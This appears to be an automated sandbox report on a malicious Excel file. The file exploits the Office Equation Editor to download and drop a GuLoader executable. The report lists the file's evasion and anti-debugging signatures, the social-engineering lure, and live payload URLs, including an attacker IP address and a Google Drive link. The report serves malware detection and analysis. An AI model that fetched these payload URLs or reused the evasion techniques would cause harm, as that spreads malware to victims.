Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$#U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR212.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@6/21@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Source: Yara match	File source: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.695092285.00000000001B0000.00000040.00000001.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 6_2_00405852 push ebx; ret	6_2_00405854
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004072B2 push cs; iretd	6_2_004072D0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040796C push ecx; iretd	6_2_00407985
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040772B push es; iretd	6_2_0040772C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004075F1 push ebx; iretd	6_2_00407601
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D1077 push 0BFD29CAh; retf FD29h	6_2_003D10F2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003DA563 push edx; retf	6_2_003DA569
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D8BA0 push edx; retf	6_2_003D8BAB
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B843D push es; ret	9_2_001B843E
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B15B3 push ebp; iretd	9_2_001B15B6
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8BA0 push edx; retf	9_2_001B8BAB

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: vbc.exe, 00000006.00000002.643663482.00000000003E0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: vbc.exe, 00000006.00000002.643663482.00000000003E0000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe

RDTSC instruction interceptor: First address: 000000000040C090 second address: 000000000040C090 instructions: 0x00000000 rdtsc 0x00000002 cmp al, FEh 0x00000004 xor eax, edx 0x00000006 cmp esi, 00000097h 0x0000000c dec edi 0x0000000d cmp di, 00EFh 0x00000012 movq mm7, mm5 0x00000015 jmp 00007F6370A86402h 0x00000017 cmp edi, 00000000h 0x0000001a jne 00007F6370A86328h 0x00000020 cmp bh, 00000057h 0x00000023 mov ebx, 42152221h 0x00000028 cmp dl, FFFFFF80h 0x0000002b xor ebx, DC00070Fh 0x00000031 cmp bh, 00000023h 0x00000034 add ebx, 289BD3ABh 0x0000003a cmp edx, 14h 0x0000003d psubw xmm6, xmm7 0x00000041 jmp 00007F6370A86401h 0x00000043 sub ebx, C670F8D9h 0x00000049 cmp esi, 5Eh 0x0000004c cmp bh, 00000021h 0x0000004f rdtsc

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 760

Thread sleep time: -360000s >= -30000s

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 6_2_003D8304 rdtsc

6_2_003D8304

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\Public\vbc.exe

Window / User API: threadDelayed 9848

Jump to behavior

Source: C:\Users\Public\vbc.exe

System information queried: ModuleInformation

Jump to behavior

Source: vbc.exe, 00000006.00000002.643663482.00000000003E0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: vbc.exe, 00000006.00000002.643663482.00000000003E0000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Hides threads from debuggers

Source: C:\Users\Public\vbc.exe

Thread information set: HideFromDebugger

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 6_2_003D8304 rdtsc

6_2_003D8304

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D8C0F mov eax, dword ptr fs:[00000030h]	6_2_003D8C0F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D8C73 mov eax, dword ptr fs:[00000030h]	6_2_003D8C73
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D3A50 mov eax, dword ptr fs:[00000030h]	6_2_003D3A50
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D58BB mov eax, dword ptr fs:[00000030h]	6_2_003D58BB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D3AB1 mov eax, dword ptr fs:[00000030h]	6_2_003D3AB1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D788C mov eax, dword ptr fs:[00000030h]	6_2_003D788C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D788F mov eax, dword ptr fs:[00000030h]	6_2_003D788F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D7ECE mov eax, dword ptr fs:[00000030h]	6_2_003D7ECE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D39AB mov eax, dword ptr fs:[00000030h]	6_2_003D39AB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D2F96 mov eax, dword ptr fs:[00000030h]	6_2_003D2F96
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5837 mov eax, dword ptr fs:[00000030h]	9_2_001B5837
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8C73 mov eax, dword ptr fs:[00000030h]	9_2_001B8C73
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B788F mov eax, dword ptr fs:[00000030h]	9_2_001B788F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B788C mov eax, dword ptr fs:[00000030h]	9_2_001B788C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B7ECE mov eax, dword ptr fs:[00000030h]	9_2_001B7ECE
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8BAC mov eax, dword ptr fs:[00000030h]	9_2_001B8BAC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8BFF mov eax, dword ptr fs:[00000030h]	9_2_001B8BFF

Checks if the current process is being debugged

Source: C:\Users\Public\vbc.exe

Process queried: DebugPort

Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\Public\vbc.exe

Code function: 6_2_003D60CF LdrInitializeThunk,

6_2_003D60CF

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior

Source: vbc.exe, 00000009.00000002.695186981.0000000000A90000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000009.00000002.695186981.0000000000A90000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: vbc.exe, 00000009.00000002.695186981.0000000000A90000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Stealing of Sensitive Information:

GuLoader behavior detected

Source: Initial file

Signature Results: GuLoader behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
23.95.85.181	unknown	United States		36352	AS-COLOCROSSINGUS	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://23.95.85.181/0789/vbc.exe	true	6%, Virustotal, Browse Avira URL Cloud: malware	unknown

AV Detection:

Found malware configuration

Source: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1pn-b6M_RemB"}

Multi AV Scanner detection for submitted file

Source: #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx	Virustotal: Detection: 38%			Perma Link
Source: #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx	ReversingLabs: Detection: 28%

Antivirus detection for URL or domain

Source: http://23.95.85.181/0789/vbc.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: http://23.95.85.181/0789/vbc.exe

Virustotal: Detection: 5%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Virustotal: Detection: 36%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	ReversingLabs: Detection: 20%
Source: C:\Users\Public\vbc.exe	Virustotal: Detection: 36%	Perma Link
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 20%

Machine Learning detection for dropped file

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 23.95.85.181:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 23.95.85.181:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 70MB

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=download&id=1pn-b6M_RemB

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Downloads executable code via HTTP

Source: global traffic

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181

Source: vbc.exe, 00000006.00000002.644097038.0000000003297000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.644097038.0000000003297000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000002.644097038.0000000003297000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000006.00000002.644097038.0000000003297000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: EA784B99.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000006.00000002.644097038.0000000003297000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EA784B99.emf

Jump to behavior

Source: global traffic

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4

Screenshot OCR: Enable Editing from the 16 g yellow bar above ,, This document is 18 3. Once you have enabled edi

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D26BE	6_2_003D26BE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D9AB0	6_2_003D9AB0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D0EAE	6_2_003D0EAE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D5D1F	6_2_003D5D1F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D0746	6_2_003D0746
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D0E3C	6_2_003D0E3C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D3C3F	6_2_003D3C3F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4835	6_2_003D4835
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D9437	6_2_003D9437
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D5A2D	6_2_003D5A2D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D2E23	6_2_003D2E23
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D2C0D	6_2_003D2C0D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D8C0F	6_2_003D8C0F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D420F	6_2_003D420F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D5E07	6_2_003D5E07
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D5003	6_2_003D5003
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D847F	6_2_003D847F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D507A	6_2_003D507A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D1077	6_2_003D1077
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D8C73	6_2_003D8C73
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D8464	6_2_003D8464
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4266	6_2_003D4266
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D9C63	6_2_003D9C63
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D3A50	6_2_003D3A50
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D0844	6_2_003D0844
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D0847	6_2_003D0847
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D10BD	6_2_003D10BD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4CB6	6_2_003D4CB6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D3AB1	6_2_003D3AB1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D92B3	6_2_003D92B3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D20A8	6_2_003D20A8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D469F	6_2_003D469F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D149E	6_2_003D149E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D309B	6_2_003D309B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4E8F	6_2_003D4E8F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D46F9	6_2_003D46F9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D2EFB	6_2_003D2EFB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D48F4	6_2_003D48F4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D46DE	6_2_003D46DE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D9ADB	6_2_003D9ADB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D62C5	6_2_003D62C5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D8EC2	6_2_003D8EC2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4B39	6_2_003D4B39
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D493B	6_2_003D493B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D9B3B	6_2_003D9B3B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4523	6_2_003D4523
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D491A	6_2_003D491A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4512	6_2_003D4512
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D2B0C	6_2_003D2B0C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D3F06	6_2_003D3F06
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D1303	6_2_003D1303
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D0973	6_2_003D0973
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4D73	6_2_003D4D73
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D175B	6_2_003D175B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D0F57	6_2_003D0F57
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D49BB	6_2_003D49BB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D9DB7	6_2_003D9DB7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D8FB1	6_2_003D8FB1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D39AB	6_2_003D39AB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4DAB	6_2_003D4DAB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D59A3	6_2_003D59A3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D879B	6_2_003D879B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4D95	6_2_003D4D95
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D2F96	6_2_003D2F96
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D8D8F	6_2_003D8D8F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4D89	6_2_003D4D89
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D5D81	6_2_003D5D81
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D3383	6_2_003D3383
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D7FFF	6_2_003D7FFF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D51F3	6_2_003D51F3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D0DDF	6_2_003D0DDF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D85DA	6_2_003D85DA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D61CD	6_2_003D61CD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D11C7	6_2_003D11C7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D2DC7	6_2_003D2DC7
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5CD5	9_2_001B5CD5
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B421B	9_2_001B421B
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2E13	9_2_001B2E13
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4208	9_2_001B4208
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5003	9_2_001B5003
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5E07	9_2_001B5E07
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B9437	9_2_001B9437
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4835	9_2_001B4835
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5A2D	9_2_001B5A2D
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B507A	9_2_001B507A
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8C73	9_2_001B8C73
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2E64	9_2_001B2E64
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B469F	9_2_001B469F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B9C8B	9_2_001B9C8B
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4E8F	9_2_001B4E8F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B92B3	9_2_001B92B3
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B9AB0	9_2_001B9AB0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4CB6	9_2_001B4CB6
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B18AA	9_2_001B18AA
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B3AA5	9_2_001B3AA5
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B9ADB	9_2_001B9ADB
